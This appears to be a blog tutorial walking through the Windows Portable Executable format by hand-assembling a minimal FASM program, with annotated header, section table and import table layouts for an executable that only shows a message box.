   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
   db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h

III. Portable executable header

IMAGE_DOS_HEADER: ;start : 00 (0) to 3F (63)
.e_magic dw 0x5A4D ;00 01
.e_cblp dw 0x0080 ;02 03
.e_cp dw 0x0001 ;04 05
.e_crlc dw 0x0000 ;06 07
.e_cparhdr dw 0x0004 ;08 09
.e_minalloc dw 0x0010 ;10 11
.e_maxalloc dw 0xFFFF ;12 13
.e_ss dw 0x0000 ;14 15
.e_sp dw 0x0140 ;16 17
.e_csum dw 0x0000 ;18 19
.e_ip dw 0x0000 ;20 21
.e_cs dw 0x0000 ;22 23
.e_lfarlc dw 0x0040 ;24 25
.e_ovno dw 0x0000 ;26 27
.e_res rw 4 ;28 29 | 30 31 | 32 33 | 34 35
.e_oemid dw 0x0000 ;36 37
.e_oeminfo dw 0x0000 ;38 39
.e_res2 rw 10 ;40 41 | 42 43 | 44 45 | 46 47 | 48 49 | 50 51
.e_lfanew dd 0x00000080 ;52 53 | 54 55 | 56 57 | 58 59
;60 61 62 63
1. typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header
2. WORD e_magic; // Magic number
3. WORD e_cblp; // Bytes on last page of file
4. WORD e_cp; // Pages in file
5. WORD e_crlc; // Relocations
6. WORD e_cparhdr; // Size of header in paragraphs
7. WORD e_minalloc; // Minimum extra paragraphs needed
8. WORD e_maxalloc; // Maximum extra paragraphs needed
9. WORD e_ss; // Initial (relative) SS value
10. WORD e_sp; // Initial SP value
11. WORD e_csum; // Checksum
12. WORD e_ip; // Initial IP value
13. WORD e_cs; // Initial (relative) CS value
14. WORD e_lfarlc; // File address of relocation table
15. WORD e_ovno; // Overlay number
16. WORD e_res[4]; // Reserved words
17. WORD e_oemid; // OEM identifier (for e_oeminfo)
18. WORD e_oeminfo; // OEM information; e_oemid specific
19. WORD e_res2[10]; // Reserved words
20. LONG e_lfanew; // File address of new exe header
21. } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

IMAGE_NT_HEADERS: ;start : 80 (128) to 1EF (495)
.Signature db ‘PE’,0,0 ;128 131
IMAGE_FILE_HEADER: ;start : 84 (132) to 97 (151)
.Machine dw 0x014C ;132 133 for intel 386
.NumberOfSection dw 0x0003 ;134 135
.TimeDateStamp dd %t ;136 139
.PointerToSymbolTable dd 0 ;140 143
.NumberOfSymbols dd 0 ;144 147
.SizeOfOptionalHeader dw 0x00E0 ;148 149
.Characteristic dw 0x818F ;150 151

============= Portable Executable Format Walkthrough =============

; References:

; 1. Create PE from scratch http://flatassembler.net/viewtopic.php?t=1309

; 2. LUEVELSMEYER’s description about PE file format

; 3. Microsoft PSDK July 2000 Edition

; 4. Iczelion’s PE Tutorial

IMAGE_DOS_HEADER: ;start : 00 (0) to 3F (63)

.e_magic dw 0x5A4D ;00 01

.e_cblp dw 0x0080 ;02 03

.e_cp dw 0x0001 ;04 05

.e_crlc dw 0x0000 ;06 07

.e_cparhdr dw 0x0004 ;08 09

.e_minalloc dw 0x0010 ;10 11

.e_maxalloc dw 0xFFFF ;12 13

.e_ss dw 0x0000 ;14 15

.e_sp dw 0x0140 ;16 17

.e_csum dw 0x0000 ;18 19

.e_ip dw 0x0000 ;20 21

.e_cs dw 0x0000 ;22 23

.e_lfarlc dw 0x0040 ;24 25

.e_ovno dw 0x0000 ;26 27

.e_res rw 4 ;28 29 | 30 31 | 32 33 | 34 35

.e_oemid dw 0x0000 ;36 37

.e_oeminfo dw 0x0000 ;38 39

.e_res2 rw 10 ;40 41 | 42 43 | 44 45 | 46 47 | 48 49 | 50 51

.e_lfanew dd 0x00000080 ;52 53 | 54 55 | 56 57 | 58 59

;60 61 62 63

;=====================================================================================================

DOS_STUB: ;start : 40 (64) to 7F (127)

use16 ;DOS-STUB is a 16-bit program

;push cs <- we save 1 byte here

;pop ds <- we save another 1 byte here

;our DS is less 100h from CS, DS received PSP address

mov dx,0x100 + 0x0B ;our db message starts at 0x0B because we save 3 bytes already

mov ah,0x9

int 0x21

mov ah,0x4C ;save 1 byte here because we need to use AH only for function

int 0x21



db ‘This program cannot be run in DOS mode.’,13,10,’$’

rb 0x80 – $ ;0x80 – 0x75 = rb 0xB

;=====================================================================================================

IMAGE_NT_HEADERS: ;start : 80 (128) to 1EF (495)

.Signature db ‘PE’,0,0 ;128 131



IMAGE_FILE_HEADER: ;start : 84 (132) to 97 (151)

.Machine dw 0x014C ;132 133 for intel 386

.NumberOfSection dw 0x0003 ;134 135

.TimeDateStamp dd %t ;136 139

.PointerToSymbolTable dd 0 ;140 143

.NumberOfSymbols dd 0 ;144 147

.SizeOfOptionalHeader dw 0x00E0 ;148 149

.Characteristic dw 0x818F ;150 151



IMAGE_OPTIONAL_HEADER: ;start : 98 (152) to F7 (247) * till IMAGE_DATA_DIRECTORY

;offset

.Magic dw 0x010B ;152 153

.MajorLinkerVersion db 0x01 ;154

.MinorLinkerVersion db 0x37 ;155

.SizeOfCode dd 0 ;156 159

.SizeOfInitializedData dd 0 ;160 163

.SizeOfUninitializedData dd 0 ;164 167

.AddressOfEntryPoint dd 0x2000 ;168 171 = base + 2000 = 402000 (.code section)

.BaseOfCode dd 0 ;172 175

.BaseOfData dd 0 ;176 179

.ImageBase dd 0x00400000 ;180 183 (default)

.SectionAlignment dd 0x00001000 ;184 187 4096 bytes

.FileAlignment dd 0x00000200 ;188 191 512 bytes (default)

.MajorOperatingSystemVersion dw 1 ;192 193

.MinorOperatingSystemVersion dw 0 ;194 195

.MajorImageVersion dw 0 ;196 197

.MinorImageVersion dw 0 ;198 199

.MajorSubsystemVersion dw 4 ;200 201

.MinorSubsystemVersion dw 0 ;202 203

.Win32VersionValue dd 0 ;204 207

.SizeOfImage dd 0x00004000 ;208 211

.SizeOfHeaders dd 0x00000200 ;212 215

.CheckSum dd 0x0000EF20 ;216 219

.Subsystem dw 2 ;220 221 IMAGE_SUBSYSTEM_WINDOWS_GUI

.DllCharacteristics dw 0 ;222 223

.SizeOfStackReserve dd 0x00001000 ;224 227 4096 bytes

.SizeOfStackCommit dd 0x00001000 ;228 231 4096 bytes

.SizeOfHeapReserve dd 0x00100000 ;232 235 1048576 bytes

.SizeOfHeapCommit dd 0 ;236 239

.LoaderFlags dd 0 ;240 243

.NumberOfRvaAndSizes dd 0x10 ;244 247 16 decimal



IMAGE_DATA_DIRECTORY: ;start : F8 (248) to 177 (375) * till IMAGE_SECTION_TABLE

rq 1 ;248 255

.ImportTableVA dd 0x00003000 ;256 263

.ImportTableSize dd 0x00000090

rq 14 ;we don’t need them also ;263 + 112 = 375

IMAGE_SECTION_TABLE: ;start : 178 (376) to 1EF (495)

SECTION_1:

.Name dq ‘.data’ ;start : 178 (376)

.VirtualSize dd 0x0000001D

.VirtualAddress dd 0x00001000 ;-> in memory, it is 401000

.SizeOfRawData dd 0x00000200

.PointerToRawData dd 0x00000200 ;-> in our file, it is 0x200 (512) (offset from zero)

.PointerToRelocations dd 0

.PointerToLineNumbers dd 0

.NumberOfRelocations dw 0

.NumberOfLineNumbers dw 0

.Characteristic dd 0xC0000040 ;end : 19F (415)

SECTION_2:

.Name dq ‘.code’ ;start : 1A0 (416)

.VirtualSize dd 0x0000001C

.VirtualAddress dd 0x00002000 ;-> in memory, it is 402000

.SizeOfRawData dd 0x00000200

.PointerToRawData dd 0x00000400 ;-> in our file, it is 0x400 (1024) (offset from zero)

.PointerToRelocations dd 0

.PointerToLineNumbers dd 0

.NumberOfRelocations dw 0

.NumberOfLineNumbers dw 0

.Characteristic dd 0x60000020 ;end : 1C7 (455)

SECTION_3:

.Name dq ‘.idata’ ;start : 1C8 (456)

.VirtualSize dd 0x00000090

.VirtualAddress dd 0x00003000 ;-> in memory, it is 403000

.SizeOfRawData dd 0x00000200

.PointerToRawData dd 0x00000600 ;-> in our file, it is 0x600 (1536) (offset from zero)

.PointerToRelocations dd 0

.PointerToLineNumbers dd 0

.NumberOfRelocations dw 0

.NumberOfLineNumbers dw 0

.Characteristic dd 0x40000040 ;end : 1EF (495)

; |

;our SECTION_1 points at 0x200 or (512) bytes from zero |

;since we are currently in file offset 1EF ——————————————-+

;we need to “rb 0xF” or “rq 2” so that our address from 1F0 to 1FF are filled.

rq 2 ;start : 1F0 (496) to 1FF (511)



;file offset = 0x200

;memory offset = 0x401000 = (IMAGE_OPTIONAL_HEADER.ImageBase) + (SECTION_1.VirtualAddress)

;=========================================================================================

SECTION_1_RAW_DATA: ;start : 200 (512) to 3FF (1023)

org 0x401000

msgText db ‘Message Text’,0 ;512 524

;we use 1D (29) bytes here

msgCaption db ‘Message Caption’,0 ;;525 540



; 541 to 1023 should be filled

; (1023 – 541) + 1 = 483 bytes



; we NEED to + 1 because 1023 is not INCLUDED when

; we use it to minus 541.

rb 483 ;because our .code raw data start at 400 (1024)

;and because our IMAGE_OPTIONAL_HEADER > FileAlignment is 0x200 (512) bytes

;file offset = 0x400

;memory offset = 0x402000 = (IMAGE_OPTIONAL_HEADER.ImageBase) + (SECTION_2.VirtualAddress)

;=========================================================================================

org 0x2000

SECTION_2_RAW_DATA: ;start : 400 (1024) to 5FF (1535)

use32 ;we are using 32-bit instruction

push 0x40 ;6A 40 ;MB_OK + MB_ICONASTERIK + MB_APPLMODAL

push msgCaption ;68 0D 10 40 00 ;push msgCaption

push msgText ;68 00 00 40 00 ;push msgText

push 0 ;6A 00 ;push HWND_DESKTOP

call dword [0x0040307A] ;FF 15 7A 30 40 00 ;call MessageBoxA

push 0 ;6A 00 ;push zero for ExitProcess parameter

call dword [0x0040305C] ;FF 15 5C 30 40 00 ;call ExitProcess



;we have used 1C (28) bytes here

;1052 to 1535 should be filled

;(1535 – 1052) + 1 = 484 bytes

rb 484

;file offset = 0x600

;memory offset = 0x403000 = (IMAGE_OPTIONAL_HEADER.ImageBase) + (SECTION_3.VirtualAddress)

;=========================================================================================

org 0x3000

SECTION_3_RAW_DATA: ;start : 600 (1536) to 7FF (2047)

IMAGE_IMPORT_DESCRIPTOR_1:

.OriginalFirstThunk dd 0x00003054 ;3000 3003

.TimeDateStamp dd 0 ;3004 3007

.ForwarderChain dd 0 ;3008 300B

.Name dd 0x0000303C ;300C 300F

.FirstThunk dd 0x0000305C ;3010 3013

IMAGE_IMPORT_DESCRIPTOR_2:

.OriginalFirstThunk dd 0x00003072 ;3014 3017

.TimeDateStamp dd 0 ;3018 301B

.ForwarderChain dd 0 ;301C 301F

.Name dd 0x00003049 ;3020 3023

.FirstThunk dd 0x0000307A ;3024 3027



;terminated with IMAGE_IMPORT_DESCRIPTIOR that filled with 0 zeros

rd 5 ;the structure size of IMAGE_IMPORT_DESCRIPTOR

;3028 to 303B



;Our DLL Name

.KERNEL32 db ‘KERNEL32.DLL’,0 ;303C to 3048

.USER32 db ‘USER32.DLL’,0 ;3049 to 3053

IMAGE_THUNK_DATA32_1:

.ForwarderString dd 0x00003064 ;3054 3057

.Function dd 0 ;3058 305B

.Ordinal dd 0x00003064 ;305C 305F

.AddressOfData dd 0 ;3060 3063

IMAGE_IMPORT_BY_NAME_1:

.Hint dw 0 ;3064 3065

.Name db ‘ExitProcess’,0 ;3066 3071

IMAGE_THUNK_DATA32_2:

.ForwarderString dd 0x00003082 ;3072 3075

.Function dd 0 ;3076 3079

.Ordinal dd 0x00003082 ;307A 307D

.AddressOfData dd 0 ;307E 3081

IMAGE_IMPORT_BY_NAME_2:

.Hint dw 0 ;3082 3083

.Name db ‘MessageBoxA’,0 ;3084 308F

;308F = 143 bytes used

;must filled 2047 – (1536 + 143) = 368 + 1 = 369 bytes

rb 367

db 0

	Peter Kruse on Let’s Learn: In-Depth on…
	mark Johnson on Malware Traffic Internals: Bla…
	Passion on Let’s Learn: In-Depth Re…
	Unknown on Programming Challenge in …
	Hung-Ting on Installing Cuckoo Sandbox on M…